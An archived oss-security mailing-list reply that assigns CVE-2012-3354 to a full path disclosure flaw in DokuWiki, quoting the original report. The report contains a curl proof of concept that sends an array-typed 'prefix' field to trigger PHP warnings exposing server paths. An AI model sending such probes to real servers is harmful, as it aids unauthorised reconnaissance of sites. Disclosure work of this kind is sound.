'Re: [oss-security] CVE request: Full path disclosure in DokuWiki'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] CVE request: Full path disclosure in DokuWiki
From:       Kurt Seifried <kseifried () redhat ! com>
Date:       2012-06-25 5:17:49
Message-ID: 4FE7F47D.6000702 () redhat ! com
[Download RAW message or body]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 06/24/2012 06:40 AM, Felipe Pena wrote:
> Full path disclosure in DokuWiki 
> ======================================== DokuWiki is a simple to
> use Wiki aimed at the documentation needs of a small company. It
> works on plain text files and thus needs no database. It has a 
> simple but powerful syntax which makes sure the datafiles remain
> readable outside the Wiki.
> 
> The POST input 'prefix' is not checked/casted for proper data type
> before passing to PHP's substr() function, which lead to displays
> an warning with sensitive information on server with PHP error
> level enabled:
> 
> $PRE   = cleanText(substr($_POST['prefix'], 0, -1));
> 
> $ curl -dprefix[]=1 http://localhost/dokuwiki/doku.php 2> /dev/null
> | grep Warning <b>Warning</b>:  substr() expects parameter 1 to be
> string, array given in <b>/var/www/dokuwiki/doku.php</b> on line
> <b>47</b><br /> <b>Warning</b>:  Cannot modify header information -
> headers already sent by (output started at
> /var/www/dokuwiki/doku.php:47) in 
> <b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br />
> 
> Affected versions: ======================================== - Angua
> (RC1) - Rincewind - Anteater
> 
> References: ======================================== 
> http://www.freelists.org/post/dokuwiki/Fwd-DokuWiki-Full-path-disclosure
>
>  Credits: ======================================== This
> vulnerability was discovered by Felipe Pena. Twitter: @felipensp

Please use CVE-2012-3354 for this issue.

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJP5/R9AAoJEBYNRVNeJnmTuy4QAMQ1Lde156PpN81VAVaE9XUk
vcZ6arWAvYIJzMMYlwVZlWdfhQbds4v0IbuefugnsS7XMD5/+Gn0Y07ulqTWiDMY
dQ6ESNkVvTW959S977aSullrYlF3LDgYxb48dvclza8fxQxQZRKGZ/ppHJ2+CGqn
sGwiJjF/zAQDYRiNl9+FE2aLrWjUTU1IEIwAHzPMa/jMO/XPhMVjU48JntMd1f/n
rcpUbTVByY2dFaPGpH8APFCjPlCk3fkWZCzGmGRNkZQBvGrGBFOHdbeP+zSITwd5
ksQqhzOG4X43VGMpkMREgMc9+korDplKGAjBGGHZKOGQA6ad3rjspHpnmfkyn7wY
Ug3aolQtwsOyzYBA/LRpYNZcRTYGRRSnoutjNkGaAZHjiLKixrlmv99CxubCefLf
d0q7qF1gMaZX3bY1X9cYcatKDI/26Xlr1zsDYXyQsmqNbqqsvaZ98lq3dR3r1BbD
kEIkEF2kCvB8XEtgpPni7MwyLI5vf7iFOMyVzVmgT8jvTME1dpph0aL7L0nm65Ko
YkgGk8ppC3wN2v9AC6N/fAAFUzPuCUGmIDDMqXL6/T/4Kxem0a2NzlTdxpUgQqgW
m7xs0HgdBjRpeTD8Oz0yWpirQDjplLpbNRC08ZekRn8Tuz4pjtveHuSJMNLeNPOs
vO1optUzhVkE9I0lJAuE
=gzwk
-----END PGP SIGNATURE-----
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic